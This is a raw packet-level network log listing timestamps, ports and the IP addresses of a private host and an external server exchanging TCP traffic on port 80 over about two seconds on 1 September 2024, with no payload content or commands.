Sep 1, 2024 20:09:08.108066082 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108078003 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108091116 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108100891 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108105898 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.108114004 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108119965 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.108129025 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108144045 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.108174086 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.108781099 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108793020 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108802080 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108813047 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108829021 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108831882 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.108840942 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108843088 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.108853102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.108871937 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.108896971 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.109642029 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.109653950 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.109663963 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.109674931 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.109683990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.109694004 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.109694958 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.109707117 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.109714031 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.109716892 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.109740019 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.109766006 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.235945940 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.236079931 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.236090899 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.236205101 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.236205101 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.236205101 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.236274958 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.236287117 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.236304998 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.236324072 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.236346006 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.236588955 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.236601114 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.236613035 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.236644983 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.236659050 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.237329006 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.237379074 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.237395048 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.237405062 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.237471104 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.237549067 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.237596989 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.237951040 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.237999916 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.238029003 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.238044977 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.238079071 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.238090992 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.238925934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.238976002 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.239012003 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.239022970 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.239062071 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.239121914 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.239172935 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.240658998 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.240705967 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.240744114 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.240760088 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.240793943 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.240806103 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.240942001 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.240994930 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.505028009 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505079031 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505091906 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505110025 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.505141973 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.505342007 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505354881 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505366087 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505378962 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505400896 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.505419016 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.505739927 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505789042 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.505837917 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505851030 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505861998 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505875111 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505886078 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.505888939 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505903006 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.505908966 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.505950928 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.506731033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.506743908 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.506752968 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.506764889 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.506777048 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.506783009 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.506788015 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.506799936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.506810904 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.506819010 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.506851912 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.507527113 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.507539988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.507594109 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.700028896 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700087070 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700104952 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700210094 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.700210094 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.700337887 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700350046 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700366020 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700377941 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700397968 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.700431108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.700726986 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700740099 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700783968 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.700975895 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.700994015 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701005936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701018095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701037884 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.701062918 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.701473951 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701486111 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701495886 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701508999 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701525927 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701531887 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.701539993 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701554060 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701560974 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.701567888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.701589108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.701617002 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.702338934 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.702349901 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.702361107 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.702373028 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.702385902 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.702398062 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.702397108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.702414036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.702430010 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.702430010 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.702454090 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.702478886 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.703197956 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.703211069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.703222036 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.703233957 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.703244925 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.703254938 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.703258991 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.703273058 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.703280926 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.703318119 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.703739882 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.703752995 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.703797102 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.703994989 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.704008102 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.704051971 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.704143047 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.704195023 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.942907095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.942967892 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.942971945 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.942987919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943016052 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.943042040 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.943166971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943211079 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.943240881 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943284035 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.943392992 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943406105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943417072 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943449974 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.943485975 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.943643093 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943689108 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.943769932 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943782091 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943793058 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.943821907 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.943850040 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.947485924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.947539091 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:08.947577000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.947588921 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:08.947629929 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.123157024 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.123200893 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.123223066 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.123241901 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.125969887 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.126028061 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.126040936 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.126053095 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.126084089 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.126107931 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.127161980 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.127208948 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.127235889 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.127248049 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.127283096 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.127304077 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.128043890 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128091097 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.128102064 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128113031 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128154993 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.128283024 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128294945 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128326893 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.128359079 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.128463984 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128474951 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128524065 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.128593922 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128607988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128619909 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128632069 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128643990 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128698111 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.128957033 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.128968000 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.129008055 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.129045010 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.129090071 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.129102945 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.129142046 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.131665945 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.131721973 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.131743908 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.131757021 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.131792068 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.131927967 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.131974936 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.132395983 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.132450104 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.132477045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.132496119 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.132524967 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.132551908 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.319454908 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.319504023 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.319516897 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.319787979 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.321937084 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.321949959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.321959972 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.322001934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.322055101 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.322067022 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.322113991 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.322158098 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.322170019 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.322212934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.322772026 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.322824955 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.322901011 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.322954893 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.323038101 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.323085070 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.323183060 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.323235035 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.323344946 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.323357105 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.323368073 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.323381901 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.323400021 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.323437929 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.323833942 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.323887110 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.324512959 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.324564934 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.324661016 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.324672937 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.324713945 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.408740044 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.408904076 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.408931971 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.408983946 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.530189991 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530251026 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.530281067 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530292988 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530324936 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.530366898 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.530411005 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530422926 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530447960 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.530478954 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.530627966 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530641079 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530652046 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530664921 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530675888 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.530678034 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.530733109 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.531117916 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.531164885 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.531260014 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.531270981 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.531310081 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.932384968 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.932445049 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.932457924 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.932605028 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.932605028 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.932699919 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.932712078 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.932723045 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.932742119 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.932898045 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.932898045 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.932898045 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.933078051 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.933120966 CEST	49738	80	192.168.2.4	185.215.113.16
Sep 1, 2024 20:09:09.933161020 CEST	80	49738	185.215.113.16	192.168.2.4
Sep 1, 2024 20:09:09.933173895 CEST	80	49738	185.215.113.16	192.168.2.4
